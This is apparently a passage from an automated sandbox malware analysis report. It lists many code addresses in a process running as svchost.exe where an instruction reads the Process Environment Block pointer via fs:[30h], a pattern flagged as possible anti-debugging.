            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]1_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]1_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]1_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]1_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]1_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]1_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]1_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]1_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]1_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]1_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]1_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]1_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]1_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]1_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]1_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]1_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]1_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]1_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]1_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]1_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]1_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]1_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]1_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]1_2_0342CB7E
